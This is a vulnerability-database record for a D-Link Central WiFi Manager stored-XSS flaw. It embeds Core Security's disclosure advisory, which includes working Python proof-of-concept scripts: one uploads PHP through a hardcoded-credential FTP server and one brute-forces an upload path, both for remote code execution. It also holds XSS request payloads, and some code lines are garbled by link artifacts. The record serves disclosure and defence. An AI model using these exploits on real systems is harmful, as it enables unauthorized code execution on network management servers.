var-201810-0849
Vulnerability from variot
An issue was discovered on D-Link Central WiFi Manager before v 1.03r0100-Beta1. The 'sitename' parameter of the UpdateSite endpoint is vulnerable to stored XSS. D-Link Central WiFi Manager Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. A remote attacker could use this vulnerability to inject arbitrary Web scripts or HTML. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
D-Link Central WiFiManager Software Controller Multiple Vulnerabilities
- Advisory Information
Title: D-Link Central WiFiManager Software Controller Multiple Vulnerabilities Advisory ID: CORE-2018-0010 Advisory URL: http://www.coresecurity.com/advisories/d-link-central-wifimanager-software-controller-multiple-vulnerabilities Date published: 2018-10-04 Date of last update: 2018-10-04 Vendors contacted: D-Link Release mode: Coordinated release
- Vulnerability Information
Class: Unrestricted Upload of File with Dangerous Type [CWE-434], Improper Authorization [CWE-285], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-17440, CVE-2018-17442, CVE-2018-17443, CVE-2018-17441
- Vulnerability Description
D-Link's website states that:
[1] Central WiFiManager Software Controller helps network administrators streamline their wireless access point (AP) management workflow. Central WiFiManager is an innovative approach to the more traditional hardware-based multiple access point management system. It uses a centralized server to both remotely manage and monitor wireless APs on a network.
Vulnerabilities were found in the Central WiFiManager Software Controller, allowing unauthenticated and authenticated file upload with dangerous type that could lead to remote code execution with system permissions. Also, two stored Cross Site Scripting vulnerabilities were found.
-
Vulnerable Packages
. Central WifiManager v1.03
Other products and versions might be affected, but they were not tested.
- Vendor Information, Solutions and Workarounds
D-Link released the following Beta version that addresses the reported vulnerabilities:
. Central WifiManager v 1.03r0100-Beta1
In addition, D-Link published a security note in: https://securityadvisories.dlink.com/announcement/publication.aspx?name=SAP10092
- Credits
These vulnerabilities were discovered and researched by Julian Munoz from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
D-Link Central WiFiManager Software Controller exposes an FTP server that serves by default in port 9000 and has hardcoded credentials (admin, admin). Taking advantage of this fact, we will upload a PHP file in the '/web/public' directory and then, by requesting this file, will be able to execute arbitrary code on the target system (shown in 7.1).
On 7.2 we show a similar attack to but in this case with an authenticated user in the web application. The application has a functionality to upload a .rar file used for the captive portal displayed by the Access Points. We will craft a .rar with a PHP file that we will end up executing in the context of the web application. When the .rar is uploaded is stored in the path "\web\captivalportal" in a folder with a timestamp created by the PHP time() function. In order to know what is the web server's time we request an information file that contains the time we are looking for. After we have the server's time we upload the .rar, calculate the proper epoch and request the appropriate path increasing this epoch by one until we hit the correct one.
7.1. Unauthenticated Remote Code Execution by Unrestricted Upload of File with Dangerous Type
[CVE-2018-17440] The web application starts an FTP server running on the port 9000 by default with admin/admin credentials and do not show the option to change it, so in this POC we establish a connection with the server and upload a PHP file. Since the application do not restrict unauthenticated users to request any file in the web root, we later request the uploaded file to achieve remote code execution.
/----- import requests from ftplib import FTP
stablish connection with FTP server
host_ip = "127.0.0.1" ftp = FTP() ftp.connect(host=host_ipftp://ftp.connect(host=host_ip, port=9000) ftp.login(ftp://ftp.login("admin", "admin") data = []
create PHP poc file
poc_php_file = open("poc.php", "w+") poc_php_file.write("<?php\nsystem('whoami');\n?>") poc_php_file.close()
upload PHP poc file
php_file = open("poc.php", "rb") ftp.cwd('/web/public')ftp://ftp.cwd('/web/public') ftp.storbinary(ftp://ftp.storbinary("STOR write_file.php", php_file) ftp.dir(data.append)ftp://ftp.dir(data.append) ftp.quit()ftp://ftp.quit()
for line in data: print "-", line
session = requests.Session() session.trust_env = False
get the uploaded file for remote code execution
get_uploaded_file = session.get('https://127.0.0.1/public/write_file.php', verify=False)
print get_uploaded_file.text -----/
7.2. Authenticated Remote Code Execution by Unrestricted Upload of File with Dangerous Type
[CVE-2018-17442] In this case we make a file upload using the functionality given by the onUploadLogPic endpoint, that will take a .rar file, decompress it and store it in a folder named after the PHP time() function. Our goal is first obtain the server's time, upload a .rar with our PHP file, calculate the proper epoch and iterate increasing it until we hit the proper one and remote code execution is achieved.
/----- import re import time import requests import datetime import tarfile
def parse_to_datetime(date_string): date_list = date_string.split("-") td = date_list[2][2:].split(":") return datetime.datetime(int(date_list[0]), int(date_list[1]), int(date_list[2][:2]),int(td[0]), int(td[1]), int(td[2]))
session = requests.Session() session.trust_env = False php_session_id = "96sml0e9soke02k6d672oumqq4" #example (insert here the proper session id) cookie = {'PHPSESSID': php_session_id}
create tar file to upload.
poc_php_file = open("poc.php", "w+") poc_php_file.write("<?php\nsystem('whoami');\n?>") poc_php_file.close()
poc_tar_file = tarfile.open("poc_tar_file.tar", mode="w") poc_tar_file.add("poc.php") poc_tar_file.close()
get server datetime.
get_server_time_from_requested_file = session.get('https://127.0.0.1/index.php/ReportSecurity/ExportAP/type/TXT', cookies=cookie, verify=False) date = re.search("Date(.*)\d", get_server_time_from_requested_file.text).group().replace('DateTime ', '')
generate epoch from server's date
epoch = int(time.mktime(parse_to_datetime(date).timetuple()))
upload attack PHP file.
attack_tar_file = "poc_tar_file.tar" tar_file = {'stylename': 'attack', 'logfile': open(attack_tar_file, 'rb')} restore_backup_response = session.post('https://127.0.0.1/index.php/Config/onUploadLogPic', files=tar_file, cookies=cookie, verify=False)
for i in range(0,20): #get the uploaded file named after time epoch, returned by PHP time() function. filename = str(epoch) + "/" + "poc.php" get_uploaded_file = session.get('https://127.0.0.1/captivalportal/%s' %filename, verify=False) if get_uploaded_file.status_code == 200: print "Remote Code Execution Achived" print get_uploaded_file.text break epoch += 1 -----/
7.3. Cross-Site Scripting in the application site name parameter
[CVE-2018-17443] The 'sitename' parameter of the UpdateSite endpoint is vulnerable to a stored Cross Site Scripting:
The following is a proof of concept to demonstrate the vulnerability:
/----- POST /index.php/Config/UpdateSite HTTP/1.1 Host: 10.2.45.220 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.2.45.220/index.php/Config/CreatSite Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US; PHPSESSID=4fvbnmn343424rg8m1jg3qbc05 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 66
siteid=0&sitename=&sitenamehid=fakesitename&UserMember%5B%5D=1 -----/
7.4.
The following is a proof of concept to demonstrate the vulnerability:
/----- POST /index.php/System/addUser HTTP/1.1 Host: 10.2.45.220 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.2.45.220/index.php/System/userManager Content-Type: application/x-www-form-urlencoded; Content-Length: 96 Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US; PHPSESSID=4fvbnmn343424rg8m1jg3qbc05 Connection: close
username=&userpassword=fakepassword&level=1&email=&remark=&userid=0&creator=1&mandatory=change& -----/
- Report Timeline
2018-06-04: Core Security sent an initial notification to D-Link, including a draft advisory. 2018-06-06:D-Link confirmed the reception of the advisory and informed they will have an initial response on 06/08. 2018-06-08: D-Link informed that they would provide a schedule for the fixes on 06/13. 2018-06-08: Core Security thanked the update. 2018-06-14: D-Link informed its plan of remediation and notified Core Security that the fixed version will be available on 08/31. 2018-06-15: Core Security thanked the update and proposed to keep in regular contact until this tentative release date. 2018-07-23: Core Security requested a status update. 2018-07-25: D-Link answered saying that they are still targeting 08/31 as the release date. 2018-08-24: Core Security requested a new status update and a solidified release date for the fixed version. 2018-08-28: D-Link sent a beta version for test. 2018-08-30: Core Security tested the beta version and requested D-Link to coordinate a release date. 2018-09-21: D-Link informed that they were planning a security announcement and they were ready to schedule a disclosure date. 2018-09-24: Core Security thanked the update and proposed October 4th as the publication date. 2018-10-04: Advisory CORE-2018-0010 published.
- References
[1] http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/.
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.cominfo@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "central wifimanager",
"scope": "gte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.00"
},
{
"_id": null,
"model": "central wifimanager",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03"
},
{
"_id": null,
"model": "central wifi manager",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.03r0100-beta1"
},
{
"_id": null,
"model": "central wifi manager \u003c1.03r0100-beta1",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20464"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010759"
},
{
"db": "NVD",
"id": "CVE-2018-17443"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:d-link:central_wifimanager",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010759"
}
]
},
"credits": {
"_id": null,
"data": "Core Security Technologies, Julian Munoz",
"sources": [
{
"db": "PACKETSTORM",
"id": "149673"
}
],
"trust": 0.1
},
"cve": "CVE-2018-17443",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2018-17443",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-20464",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-127903",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2018-17443",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-17443",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2018-17443",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2018-20464",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201810-274",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-127903",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20464"
},
{
"db": "VULHUB",
"id": "VHN-127903"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010759"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-274"
},
{
"db": "NVD",
"id": "CVE-2018-17443"
}
]
},
"description": {
"_id": null,
"data": "An issue was discovered on D-Link Central WiFi Manager before v 1.03r0100-Beta1. The \u0027sitename\u0027 parameter of the UpdateSite endpoint is vulnerable to stored XSS. D-Link Central WiFi Manager Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. A remote attacker could use this vulnerability to inject arbitrary Web scripts or HTML. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nD-Link Central WiFiManager Software Controller Multiple Vulnerabilities\n\n1. *Advisory Information*\n\nTitle: D-Link Central WiFiManager Software Controller Multiple\nVulnerabilities\nAdvisory ID: CORE-2018-0010\nAdvisory URL: http://www.coresecurity.com/advisories/d-link-central-wifimanager-software-controller-multiple-vulnerabilities\nDate published: 2018-10-04\nDate of last update: 2018-10-04\nVendors contacted: D-Link\nRelease mode: Coordinated release\n\n2. *Vulnerability Information*\n\nClass: Unrestricted Upload of File with Dangerous Type [CWE-434],\nImproper Authorization [CWE-285], Improper Neutralization of Input\nDuring Web Page Generation (\u0027Cross-site Scripting\u0027) [CWE-79], Improper\nNeutralization of Input During Web Page Generation\n(\u0027Cross-site Scripting\u0027) [CWE-79]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-17440, CVE-2018-17442, CVE-2018-17443, CVE-2018-17441\n\n3. *Vulnerability Description*\n\nD-Link\u0027s website states that:\n\n[1] Central WiFiManager Software Controller helps network administrators\nstreamline their wireless access point (AP) management workflow. Central\nWiFiManager is an innovative approach to the more traditional\nhardware-based multiple access point management system. It uses a\ncentralized server to both remotely manage and monitor wireless APs on a\nnetwork. \n\nVulnerabilities were found in the Central WiFiManager Software\nController, allowing unauthenticated and authenticated file upload with\ndangerous type that could lead to remote code execution with system\npermissions. Also, two stored Cross Site Scripting vulnerabilities were\nfound. \n\n4. *Vulnerable Packages*\n\n . Central WifiManager v1.03\n\nOther products and versions might be affected, but they were not tested. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nD-Link released the following Beta version that addresses the reported vulnerabilities:\n\n . Central WifiManager v 1.03r0100-Beta1\n\nIn addition, D-Link published a security note in:\nhttps://securityadvisories.dlink.com/announcement/publication.aspx?name=SAP10092\n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Julian Munoz\nfrom Core Security Consulting Services. The publication of this advisory\nwas coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nD-Link Central WiFiManager Software Controller exposes an FTP server\nthat serves by default in port 9000 and has hardcoded credentials\n(admin, admin). Taking advantage of this fact, we will upload a PHP file\nin the \u0027/web/public\u0027 directory and then, by requesting this file, will\nbe able to execute arbitrary code on the target system (shown in 7.1). \n\nOn 7.2 we show a similar attack to but in this case with an\nauthenticated user in the web application. The application has a\nfunctionality to upload a .rar file used for the captive portal\ndisplayed by the Access Points. We will craft a .rar with a PHP file\nthat we will end up executing in the context of the web application. \nWhen the .rar is uploaded is stored in the path \"\\web\\captivalportal\" in\na folder with a timestamp created by the PHP time() function. In order\nto know what is the web server\u0027s time we request an information file\nthat contains the time we are looking for. After we have the server\u0027s\ntime we upload the .rar, calculate the proper epoch and request the\nappropriate path increasing this epoch by one until we hit the correct\none. \n\n7.1. *Unauthenticated Remote Code Execution by Unrestricted Upload of\nFile with Dangerous Type*\n\n[CVE-2018-17440] The web application starts an FTP server running on the\nport 9000 by default with admin/admin credentials and do not show the\noption to change it, so in this POC we establish a connection with the\nserver and upload a PHP file. Since the application do not restrict\nunauthenticated users to request any file in the web root, we later\nrequest the uploaded file to achieve remote code execution. \n\n/-----\nimport requests\nfrom ftplib import FTP\n\n#stablish connection with FTP server\nhost_ip = \"127.0.0.1\"\nftp = FTP()\nftp.connect(host=host_ip\u003cftp://ftp.connect(host=host_ip\u003e, port=9000)\nftp.login(\u003cftp://ftp.login(\u003e\"admin\", \"admin\")\ndata = []\n\n#create PHP poc file\npoc_php_file = open(\"poc.php\", \"w+\")\npoc_php_file.write(\"\u003c?php\\nsystem(\u0027whoami\u0027);\\n?\u003e\")\npoc_php_file.close()\n\n#upload PHP poc file\nphp_file = open(\"poc.php\", \"rb\")\nftp.cwd(\u0027/web/public\u0027)\u003cftp://ftp.cwd(\u0027/web/public\u0027)\u003e\nftp.storbinary(\u003cftp://ftp.storbinary(\u003e\"STOR write_file.php\", php_file)\nftp.dir(data.append)\u003cftp://ftp.dir(data.append)\u003e\nftp.quit()\u003cftp://ftp.quit()\u003e\n\nfor line in data:\n print \"-\", line\n\nsession = requests.Session()\nsession.trust_env = False\n\n#get the uploaded file for remote code execution\nget_uploaded_file = session.get(\u0027https://127.0.0.1/public/write_file.php\u0027, verify=False)\n\nprint get_uploaded_file.text\n-----/\n\n7.2. *Authenticated Remote Code Execution by Unrestricted Upload of File with Dangerous Type*\n\n[CVE-2018-17442] In this case we make a file upload using the\nfunctionality given by the onUploadLogPic endpoint, that will take a\n.rar file, decompress it and store it in a folder named after the PHP\ntime() function. Our goal is first obtain the server\u0027s time, upload a\n.rar with our PHP file, calculate the proper epoch and iterate\nincreasing it until we hit the proper one and remote code execution is\nachieved. \n\n/-----\nimport re\nimport time\nimport requests\nimport datetime\nimport tarfile\n\ndef parse_to_datetime(date_string):\n date_list = date_string.split(\"-\")\n td = date_list[2][2:].split(\":\")\n return datetime.datetime(int(date_list[0]), int(date_list[1]), int(date_list[2][:2]),int(td[0]), int(td[1]), int(td[2]))\n\nsession = requests.Session()\nsession.trust_env = False\nphp_session_id = \"96sml0e9soke02k6d672oumqq4\" #example (insert here the proper session id)\ncookie = {\u0027PHPSESSID\u0027: php_session_id}\n\n#create tar file to upload. \npoc_php_file = open(\"poc.php\", \"w+\")\npoc_php_file.write(\"\u003c?php\\nsystem(\u0027whoami\u0027);\\n?\u003e\")\npoc_php_file.close()\n\npoc_tar_file = tarfile.open(\"poc_tar_file.tar\", mode=\"w\")\npoc_tar_file.add(\"poc.php\")\npoc_tar_file.close()\n\n#get server datetime. \nget_server_time_from_requested_file = session.get(\u0027https://127.0.0.1/index.php/ReportSecurity/ExportAP/type/TXT\u0027,\n cookies=cookie, verify=False)\ndate = re.search(\"Date(.*)\\d\", get_server_time_from_requested_file.text).group().replace(\u0027DateTime \u0027, \u0027\u0027)\n#generate epoch from server\u0027s date\nepoch = int(time.mktime(parse_to_datetime(date).timetuple()))\n\n#upload attack PHP file. \nattack_tar_file = \"poc_tar_file.tar\"\ntar_file = {\u0027stylename\u0027: \u0027attack\u0027, \u0027logfile\u0027: open(attack_tar_file, \u0027rb\u0027)}\nrestore_backup_response = session.post(\u0027https://127.0.0.1/index.php/Config/onUploadLogPic\u0027,\n files=tar_file,\n cookies=cookie, verify=False)\n\nfor i in range(0,20):\n #get the uploaded file named after time epoch, returned by PHP time() function. \n filename = str(epoch) + \"/\" + \"poc.php\"\n get_uploaded_file = session.get(\u0027https://127.0.0.1/captivalportal/%s\u0027 %filename, verify=False)\n if get_uploaded_file.status_code == 200:\n print \"Remote Code Execution Achived\"\n print get_uploaded_file.text\n break\n epoch += 1\n-----/\n\n7.3. *Cross-Site Scripting in the application site name parameter*\n\n[CVE-2018-17443] The \u0027sitename\u0027 parameter of the UpdateSite endpoint is\nvulnerable to a stored Cross Site Scripting:\n\nThe following is a proof of concept to demonstrate the vulnerability:\n\n/-----\nPOST /index.php/Config/UpdateSite HTTP/1.1\nHost: 10.2.45.220\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101\nFirefox/52.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://10.2.45.220/index.php/Config/CreatSite\nCookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US;\nPHPSESSID=4fvbnmn343424rg8m1jg3qbc05\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 66\n\nsiteid=0\u0026sitename=\u003cscript\u003ealert(1)\u003c/script\u003e\u0026sitenamehid=fakesitename\u0026UserMember%5B%5D=1\n-----/\n\n7.4. \n\nThe following is a proof of concept to demonstrate the vulnerability:\n\n/-----\nPOST /index.php/System/addUser HTTP/1.1\nHost: 10.2.45.220\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101\nFirefox/52.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://10.2.45.220/index.php/System/userManager\nContent-Type: application/x-www-form-urlencoded;\nContent-Length: 96\nCookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US;\nPHPSESSID=4fvbnmn343424rg8m1jg3qbc05\nConnection: close\n\nusername=\u003cscript\u003ealert(1)\u003c/script\u003e\u0026userpassword=fakepassword\u0026level=1\u0026email=\u0026remark=\u0026userid=0\u0026creator=1\u0026mandatory=change\u0026\n-----/\n\n8. *Report Timeline*\n\n2018-06-04: Core Security sent an initial notification to D-Link,\nincluding a draft advisory. \n2018-06-06:D-Link confirmed the reception of the advisory and informed\nthey will have an initial response on 06/08. \n2018-06-08: D-Link informed that they would provide a schedule for the\nfixes on 06/13. \n2018-06-08: Core Security thanked the update. \n2018-06-14: D-Link informed its plan of remediation and notified Core\nSecurity that the fixed version will be available on 08/31. \n2018-06-15: Core Security thanked the update and proposed to keep in\nregular contact until this tentative release date. \n2018-07-23: Core Security requested a status update. \n2018-07-25: D-Link answered saying that they are still targeting 08/31\nas the release date. \n2018-08-24: Core Security requested a new status update and a solidified\nrelease date for the fixed version. \n2018-08-28: D-Link sent a beta version for test. \n2018-08-30: Core Security tested the beta version and requested D-Link\nto coordinate a release date. \n2018-09-21: D-Link informed that they were planning a security\nannouncement and they were ready to schedule a disclosure date. \n2018-09-24: Core Security thanked the update and proposed October 4th as\nthe publication date. \n2018-10-04: Advisory CORE-2018-0010 published. \n\n9. *References*\n\n[1] http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/. \n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with\nanticipating the future needs and requirements for information security\ntechnologies. We conduct our research in several important areas of\ncomputer security including system vulnerabilities, cyber attack\nplanning and simulation, source code auditing, and cryptography. Our\nresults include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The\ncompany\u0027s threat-aware, identity \u0026 access, network security, and\nvulnerability management solutions provide actionable insight and\ncontext needed to manage security risks across the enterprise. This\nshared insight gives customers a comprehensive view of their security\nposture to make better security remediation decisions. Better insight\nallows organizations to prioritize their efforts to protect critical\nassets, take action sooner to mitigate access risk, and react faster if\na breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\u003cmailto:info@coresecurity.com\u003e\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and\n(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-17443"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010759"
},
{
"db": "CNVD",
"id": "CNVD-2018-20464"
},
{
"db": "VULHUB",
"id": "VHN-127903"
},
{
"db": "PACKETSTORM",
"id": "149673"
}
],
"trust": 2.34
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-127903",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-127903"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2018-17443",
"trust": 3.2
},
{
"db": "DLINK",
"id": "SAP10092",
"trust": 2.4
},
{
"db": "EXPLOIT-DB",
"id": "45533",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010759",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201810-274",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-20464",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-127903",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "149673",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20464"
},
{
"db": "VULHUB",
"id": "VHN-127903"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010759"
},
{
"db": "PACKETSTORM",
"id": "149673"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-274"
},
{
"db": "NVD",
"id": "CVE-2018-17443"
}
]
},
"id": "VAR-201810-0849",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20464"
},
{
"db": "VULHUB",
"id": "VHN-127903"
}
],
"trust": 1.1984848499999998
},
"iot_taxonomy": {
"_id": null,
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20464"
}
]
},
"last_update_date": "2024-11-23T21:38:13.380000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Central WiFi Manager (CWM-100) :: Multiple vulnerability disclosed - Fix released",
"trust": 0.8,
"url": "https://securityadvisories.dlink.com/announcement/publication.aspx?name=SAP10092"
},
{
"title": "Patch for D-Link Central WiFi Manager Cross-Site Scripting Vulnerability (CNVD-2018-20464)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/141705"
},
{
"title": "D-Link Central WiFi Manager Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=85471"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-20464"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010759"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-274"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-127903"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010759"
},
{
"db": "NVD",
"id": "CVE-2018-17443"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.4,
"url": "https://securityadvisories.dlink.com/announcement/publication.aspx?name=sap10092"
},
{
"trust": 2.3,
"url": "http://seclists.org/fulldisclosure/2018/oct/11"
},
{
"trust": 1.7,
"url": "https://www.exploit-db.com/exploits/45533/"
},
{
"trust": 1.7,
"url": "https://www.secureauth.com/labs/advisories/d-link-central-wifimanager-software-controller-multiple-vulnerabilities"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-17443"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-17443"
},
{
"trust": 0.7,
"url": "https://www.coresecurity.com/advisories/d-link-central-wifimanager-software-controller-multiple-vulnerabilities"
},
{
"trust": 0.1,
"url": "https://127.0.0.1/index.php/config/onuploadlogpic\u0027,"
},
{
"trust": 0.1,
"url": "https://127.0.0.1/public/write_file.php\u0027,"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-17441"
},
{
"trust": 0.1,
"url": "https://10.2.45.220/index.php/config/creatsite"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-17442"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://127.0.0.1/index.php/reportsecurity/exportap/type/txt\u0027,"
},
{
"trust": 0.1,
"url": "http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/."
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://127.0.0.1/captivalportal/%s\u0027"
},
{
"trust": 0.1,
"url": "https://10.2.45.220/index.php/system/usermanager"
},
{
"trust": 0.1,
